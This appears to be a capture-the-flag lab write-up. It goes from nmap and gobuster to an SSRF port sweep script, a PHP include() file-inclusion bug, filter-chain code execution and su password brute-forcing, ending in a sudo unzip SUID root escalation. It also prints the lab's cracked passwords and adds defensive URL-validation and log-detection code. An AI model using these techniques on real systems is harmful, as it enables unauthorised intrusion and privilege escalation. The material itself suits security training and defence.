Nmap #
[root@kali] /home/kali/status
❯ nmap 172.17.0.2 -A -p-
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Web Bunkeriana
Only port 80 is open.
Gobuser #
[root@kali] /home/kali/status
❯ gobuster dir -u http://172.17.0.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php ⏎
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.17.0.2
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 5197]
/status.php (Status: 403) [Size: 5197]
/.php (Status: 403) [Size: 5197]
/server-status (Status: 403) [Size: 5197]
Progress: 441120 / 441122 (100.00%)
===============================================================
Finished
===============================================================
There is a status.php, which returns status code 403. Statusid is 0; try changing it to 1.
[root@kali] /home/kali/status
❯ curl http://172.17.0.2/status.php -H "Statusid: 1" ⏎
<h1>Server Status</h1>
<p>200</p>
<h1>Check Status</h1>
<form method="POST">
<input type="url" name="url" placeholder="http://example.com" required>
<button>Send</button>
</form>
<footer style="position: fixed; bottom: 10px; right: 10px; font-size: 0.9em; color: gray;">
v0.2
</footer>
A url parameter can be submitted.
SSRF #
Files cannot be read directly, so probe the internal ports instead.
import requests

target = "http://172.17.0.2/status.php"

# Probe every loopback port through the SSRF; the page prints "HTTP Status: 0" when nothing answers
for port in range(1, 65536):
    url_to_check = f"http://127.0.0.1:{port}"
    payload = {'url': url_to_check}
    try:
        response = requests.post(url=target, data=payload, headers={'Statusid': '1'})
        if 'HTTP Status: 0' not in response.text:
            print(f"[+] Port open: {port}")
    except Exception:
        continue
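Server-side validation that would stop the loopback sweep above, as an added example rather than the target's code; the names check_url and resolve_host are assumed here. Redirect following and DNS rebinding still have to be handled by the fetcher itself.

```python
"""Validate a user-supplied URL before a "Check Status" fetcher requests it (added example)."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}


def _is_disallowed_ip(ip) -> bool:
    """Loopback, RFC1918, link-local (cloud metadata), multicast and reserved ranges are all refused."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def resolve_host(host: str) -> list:
    """Return every address the host maps to. Literal IPs skip DNS, so the checks run offline."""
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        pass
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return [ipaddress.ip_address(info[4][0]) for info in infos]


def check_url(url: str) -> tuple:
    """Return (ok, reason). Anything that could turn the server into a pivot is rejected."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    try:
        port = parts.port          # raises ValueError on a malformed port
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    addrs = resolve_host(parts.hostname)
    if not addrs:
        return False, "host does not resolve"
    for ip in addrs:
        if _is_disallowed_ip(ip):
            return False, f"{ip} is a loopback/private/reserved address"
    return True, "ok"
```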
file.php can be used for file inclusion.
[root@kali] /home/kali/status/backup_5025a3123660d066c9ba8617c0cd92d5/061400ca5d384de48f37a71ec23cc518/cc8e38c20e4e2f58291c0f8b2e3ace5f/dev
❯ ls
file.php status.php
[root@kali] /home/kali/status/backup_5025a3123660d066c9ba8617c0cd92d5/061400ca5d384de48f37a71ec23cc518/cc8e38c20e4e2f58291c0f8b2e3ace5f/dev
❯ cat file.php
<?php
if($_SERVER['REQUEST_METHOD'] === 'GET'){
    $file = $_GET['72e22dffd7fa10883a85aa3e0bbbd6d4'];
    include($file);
}
?>
Include #
/etc/passwd can be read by requesting the following URL:
http://172.17.0.2/061400ca5d384de48f37a71ec23cc518/cc8e38c20e4e2f58291c0f8b2e3ace5f/dev/file.php?72e22dffd7fa10883a85aa3e0bbbd6d4=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
baluton:x:1001:1001:baluton,,,:/home/baluton:/bin/bash
_galera:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:102:MariaDB Server,,,:/nonexistent:/bin/false
redghost:x:1002:1002:redghost,,,:/home/redghost:/bin/bash
Try using PHP filter chains to get command execution.
[root@kali] /home/kali/Desktop/php_filter_chain_generator (main)
❯ python php_filter_chain_generator.py --chain '<?php system($_GET["a"]);?>'
[+] The following gadget chain will generate the following code : <?php system($_GET["a"]);?> (base64 value: PD9waHAgc3lzdGVtKCRfR0VUWyJhIl0pOz8+)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.
<skip>
shell
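Detection logic for the two web-side techniques above (the status.php port sweep and the php://filter inclusion), run over constructed Apache access-log lines; this is an added example, not part of the original write-up, and the parse and detect names are assumed.

```python
"""Flag SSRF sweeps and include-parameter abuse in Apache combined logs (added example)."""
import re
from collections import Counter
from urllib.parse import unquote

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

SWEEP_THRESHOLD = 3   # POSTs to status.php from one client within one minute
LFI_MARKERS = ("php://", "convert.iconv", "/etc/passwd", "../")

# Constructed sample: four sweep hits, one filter-chain inclusion, one normal request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2025:10:00:01 +0000] "POST /status.php HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2025:10:00:01 +0000] "POST /status.php HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2025:10:00:02 +0000] "POST /status.php HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2025:10:00:02 +0000] "POST /status.php HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2025:10:00:03 +0000] "GET /dev/file.php?72e22dffd7fa10883a85aa3e0bbbd6d4=php://filter/convert.iconv.UTF8.CSISO2022KR%7Cconvert.base64-encode/resource=x HTTP/1.1" 200 88
10.0.0.9 - - [01/Jan/2025:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 1024
"""


def parse(log_text: str) -> list:
    """Parse combined-format lines into dicts; unparsable lines are skipped."""
    rows = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rows.append(m.groupdict())
    return rows


def detect(log_text: str) -> list:
    """Return (rule, client, detail) findings."""
    findings = []
    sweep = Counter()
    for r in parse(log_text):
        path = unquote(r["path"])                     # %7C etc. back to the raw characters
        if r["method"] == "POST" and path.split("?")[0].endswith("/status.php"):
            sweep[(r["ip"], r["ts"][:17])] += 1       # bucket by dd/Mon/yyyy:HH:MM
        query = path.partition("?")[2]
        hit = next((mk for mk in LFI_MARKERS if mk in query), None)
        if hit:
            findings.append(("lfi_marker", r["ip"], f"{hit} in {path[:60]}"))
    for (ip, minute), n in sweep.items():
        if n >= SWEEP_THRESHOLD:
            findings.append(("ssrf_sweep", ip, f"{n} POSTs to status.php at {minute}"))
    return findings
```

The same two rules translate directly into a SIEM query: count POSTs to status.php per source and minute, and alert on any query string carrying php:// or convert.iconv.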
SuForce #
Nothing exploitable was found, so brute-force the passwords.
www-data@f0f1168fc905:/var/www/html$ ./suForce -u baluton -w rockyou.txt
_____
___ _ _ | ___|__ _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| || _| (_) | | | (_| __/
|___/\__,_||_| \___/|_| \___\___|
───────────────────────────────────
code: d4t4s3c version: v1.0.0
───────────────────────────────────
🎯 Username | baluton
📖 Wordlist | rockyou.txt
🔎 Status | 40/14344392/0%/123123
💥 Password | 123123
───────────────────────────────────
baluton@f0f1168fc905:/var/www/html$ ./suForce -u redghost -w rockyou.txt
_____
___ _ _ | ___|__ _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| || _| (_) | | | (_| __/
|___/\__,_||_| \___/|_| \___\___|
───────────────────────────────────
code: d4t4s3c version: v1.0.0
───────────────────────────────────
🎯 Username | redghost
📖 Wordlist | rockyou.txt
🔎 Status | 104/14344392/0%/estrella
💥 Password | estrella
───────────────────────────────────
Root #
Similar to Bola.
baluton@8470eb7f0e97:/home$ sudo -l
Matching Defaults entries for baluton on 8470eb7f0e97:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User baluton may run the following commands on 8470eb7f0e97:
(ALL) NOPASSWD: /usr/bin/unzip
baluton@8470eb7f0e97:~$ cp /bin/sh .
baluton@8470eb7f0e97:~$ chmod +s sh
baluton@8470eb7f0e97:~$ zip shell.zip sh
adding: sh (deflated 52%)
baluton@8470eb7f0e97:~$ sudo unzip -K shell.zip
Archive: shell.zip
replace sh? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
inflating: sh
baluton@8470eb7f0e97:~$ ./sh -p
# id
uid=1001(baluton) gid=1001(baluton) euid=0(root) egid=0(root) groups=0(root),100(users),1001(baluton)
Alternatively, extract the archive in the root directory; it also contains the password.
baluton@8470eb7f0e97:~$ cat regalitoregalazoregalin.txt
root:balulonbalulinbalutonjeje
baluton@8470eb7f0e97:~$ su root
Password:
root@8470eb7f0e97:/home/baluton#